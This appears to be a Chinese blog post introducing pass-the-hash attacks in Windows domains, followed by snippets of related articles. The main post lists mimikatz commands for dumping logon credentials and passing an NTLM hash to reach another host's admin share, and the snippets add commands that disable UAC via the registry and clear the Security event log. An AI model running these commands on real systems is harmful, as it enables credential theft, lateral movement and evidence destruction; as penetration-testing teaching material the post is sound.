内网渗透之哈希传递原理

原创已于 2024-03-19 09:24:22 修改 · 563 阅读

8 ·

CC 4.0 BY-SA版权

文章标签：

#安全

于 2024-03-18 19:36:58 首次发布

内网渗透专栏收录该内容

3 篇文章

订阅专栏

博客介绍了哈希传递原理，还介绍了常用工具mimikatz。前提是拿下域内某主机管理员权限后运行该工具，给出了提权、获取登录信息等命令，最后说明按命令字加主机ip形式可进行操作。

一、哈希传递原理简介

二、常用工具mimikatz

前提：拿下域内某主机管理员权限，运行mimikatz

命令：

privilege::debug 提权

sekurlsa::logonpasswords 获取内存中保存的登录信息

sekurlsa::pth /user:administrator /domain:xxxx.com /ntlm:xxxxxxxxxxxxxxxxx

接下来只要按照如下命令字 + 主机ip的形式即可

dir \\xxx.xxx.xxx.xxx\c$

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

codeZMJ

关注关注

15
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

内网渗透——哈希传递

来日可期的博客

10-09

1965

哈希传递攻击（Pass The Hash）是基于 NTLM 认证缺陷的一种攻击方式，攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中，大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同，攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。

域渗透之哈希传递攻击及其原理

把自己活成一道光，因为你不知道，谁会借着你的光，走出了黑暗。请保持心中的善良，因为你不知道，谁会借着你的善良，走出了绝望。请保持你心中的信仰，因为你不知道，谁会借着你的信仰，走出了迷茫。请相信自己的力量，因为你不知道，谁会因为相信你，开始相信了自己....

12-09

2921

哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值，但是解不开明文。这时我们可以利用NTLM认证的一种缺陷，利用用户的密码哈希值来进行NTLM认证。在域环境中，大量计算机在安装时会使用相同的本地管理员账号和密码。因此，如果计算机的本地管理员账号密码相同，攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。

参与评论您还未登录，请先登录后发表或查看评论

内网横传之哈希传递（Pass The Hash）

11-25

8452

本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题

PTH哈希传递攻击

Y22Lee的博客

05-23

1683

PTH(Pass The Hash)，中文叫哈希传递攻击，在NTLM和Kerberos认证中，都需要用到用户的NTLM-Hash值进行加密认证，所以我们知道了对方用户的NTLN-Hash值之后就可以使用PTH进行认证。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。

内网渗透--哈希传递

m0_62202418的博客

11-28

1582

NTLM 协议主要用于在 Windows 网络环境中对用户进行身份验证，并且在许多企业网络中被广泛采用。哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术，比如NTLM Hash、 LM Hash都不需要明文密码因此都可以被称为Hash传递攻击。早期SMB协议明文在网络上传输数据，后来诞生了LM验证机制，LM机制由于过于简单，微软提出了WindowsNT挑战/响应机制，这就是NTLM。4.sekurlsa::logonpasswords ，获取内存中保存的登录信息。/ntlm：获取的NTLM。

内网渗透 - 哈希传递攻击

LuckySec

06-06

2806

在内网渗透过程中，当获取到某个管理员用户的密码 hash 值却无法解密时，可以通过哈希传递攻击（Pass The Hash）对内网其他机器进行横向渗透。哈希传递攻击（Pass The Hash）是基于 NTLM 认证缺陷的一种攻击方式，攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中，大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同，攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击，攻击者不需要花时间破解密码哈希值来获取明文密码

内网渗透 / 哈希传递

weixin_51559599的博客

11-28

514

实际情况下拿到的用户一般为程序用户大部分提权是基于溢出漏洞的提权（

内网渗透、哈希传递、获取域控权限

weixin_51559599的博客

12-15

819

使用蚁剑打开命令终端运行该程序， DMZ 主机上线。网卡2（仅主机）172.16.1.128。网卡1（桥接）10.9.47.110。域控（win 2008）（仅主机）此时 DMZ 主机还是普通用户权限。使用 dvwa 文件上传模拟漏洞。调到 low 模式上传一句话木马。使用蚁剑将木马上传到 DMZ 上。指定成功传递后与哪个主机做连接。抓取本地 ntlm hash。选择刚刚创建的 smb 监听。win11（nat 模式）访问 DMZ（win7）提权到 system。查看扫描出的内网主机。

内网渗透(哈希传递)

xy_wjyjw的博客

11-28

1299

哈希传递攻击是由于局域网内有多台主机存在相同密码造成的，绕过ntlm认证。

总结HashMap实现原理分析

洞玄之境的博客

03-30

2万+

一、底层数据结构在JDK1.6，JDK1.7中，HashMap采用位桶+链表实现，即使用链表处理冲突,同一hash值的键值对会被放在同一个位桶里，当桶中元素较多时，通过key值查找的效率较低。而JDK1.8中，HashMap采用位桶+链表+红黑树实现，当链表长度超过阈值（8）,时，将链表转换为红黑树，这样大大减少了查找时间。二、HashMap的实现原理： JDK1.7中的Ha...

Windows NTLM Hash和Hash传递、Key传递攻击

weixin_30563917的博客

07-04

2136

Hash(Key) 获取工具： Mimikatz 用法： .\mimikatz.exe privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash和明文密码（如果可以的话） sekurlsa::ekeys #获取kerberos加密凭证 Hash(Key)传递 Mimikatz sekurlsa::pth /user:xxxxxxx...

HashMap原理深入理解

热门推荐

Visant Blog

04-23

8万+

hashing(散列法或哈希法)的概念散列法（Hashing）是一种将字符组成的字符串转换为固定长度（一般是更短长度）的数值或索引值的方法，称为散列法，也叫哈希法。由于通过更短的哈希值比用原始值进行数据库搜索更快，这种方法一般用来在数据库中建立索引并进行搜索，同时还用在各种解密算法中。 HashMap概念和底层结构 HashMap是基于哈希表的Map接口的非同步实现。此实现提供所有可选的映...

哈希传递攻击(Pass-the-Hash,PtH)

谢公子的博客

01-11

5475

目录哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997补丁产生的影响哈希传递攻击哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们...

哈希传递-PTH与票据传递-PTT

Armandhe的博客

07-21

709

hash传递与票据传递，简直就是6666666

PtH(hash传递攻击)原理探秘

weixin_30500473的博客

08-10

3755

背景知识 Windows 横向渗透的两种方式 1、hash传递攻击，通过传递NTLM-Hash，登录机器，简称PtH； 2、ticket传递攻击，通过传递kerberos的ticket，登录机器，简称PtT；以上两种都是常见的域内或者叫做内网渗透的横向移动的常见手段。 NTLM协议机制简述在hash传递攻击中。传递的就是NTLMhash值，这里我们就要简述一下NTLM的过程。 NT...

哈希传递攻击（Pass-the-Hash）

whoim_i的博客

12-25

1万+

目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH（工作组）使用msf进行哈希传递攻击有些时候，当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ，并且该主机的445端口（文件共享）打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(注意：只能是adminis...

哈希算法的原理和用途详解

passport_daizi的博客

04-20

8487

什么是哈希算法？哈希是一种加密算法，也称为散列函数或杂凑函数。哈希函数是一个公开函数，可以将任意长度的消息M映射成为一个长度较短且长度固定的值H（M），称H（M）为哈希值、散列值（Hash Value）、杂凑值或者消息摘要。它是一种单向密码体制，即一个从明文到密文的不可逆映射，只有加密过程，没有解密过程。Hash的特点易压缩：对于任意大小的输入x，Hash值的长度很小，在实际应用中，函数H产生的Hash值其长度是固定的。易计算：对于任意给定的消息，计算其Hash值比较容易。单向性：对于给定的Hash值

【Sql Server】sql server 2019设置远程访问，外网服务器需要设置好安全组入方向规则

最新发布

2509_94200811的博客

12-01

759

本地电脑安装的sql server数据库可视化工具ssms连接到外网服务器的sql server数据库，实现本地化远程链接数据库进行管理和操作。

内网渗透windows 7

12-26

### 关于Windows 7内网渗透测试的方法和技巧 #### 信息收集在执行任何实际攻击之前，了解目标网络环境至关重要。这一步骤涉及识别活动目录结构、主机操作系统版本和其他潜在弱点的信息。对于Windows 7系统而言，可以利用内置工具如`netstat`, `ipconfig /all` 来查看当前连接状态和服务配置详情[^3]。 ```powershell # 查看所有网络接口配置 ipconfig /all ``` #### 获取初始访问权限为了进入内部网络，通常会寻找可被利用的应用程序漏洞或弱口令账户。一旦获得了初步立足点，则可以通过上传恶意文件或者远程桌面协议(RDP)等方式进一步深入探索。针对Windows 7, 可能存在未修补的安全更新问题，这些都可以成为突破口[^5]。 #### 提权操作成功登陆到一台机器上之后，下一步就是尝试提升自己的权限级别至管理员级甚至更高。常见的提权方式包括但不限于利用已知的本地特权升级漏洞、滥用服务配置错误等。例如，在某些情况下，可通过修改注册表键值来绕过UAC(User Account Control)[^4]。 ```batch reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f ``` > **注意**: 上述命令仅用于教育目的展示如何禁用UAC，并不建议非法使用。 #### 内部侦察与横向移动当拥有了足够的权限后，就可以开始在整个企业网络范围内展开更广泛的侦查行动了。此时应该关注的是发现其他有价值的资产位置以及可能存在的额外安全措施。借助诸如PsExec这样的实用程序可以在不同计算机之间轻松传递指令并实施控制；而像Mimikatz之类的工具则可以帮助提取存储在网络内存里的明文密码或其他认证凭证。 ```powershell # 使用Invoke-Mimikatz模块加载mimikatz功能 Import-Module .\Invoke-Mimikatz.ps1 # 抓取登录用户的哈希值 Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' ``` #### 数据泄露准备最终阶段涉及到确保能够持续监控受控节点的同时窃取所需资料。为此可能会部署持久化机制比如计划任务、启动项脚本或是隐藏型的服务进程等等。同时也要考虑到怎样有效地掩盖踪迹以免引起怀疑——删除事件日志记录就是一个不错的选择。 ```cmd wevtutil cl Security ```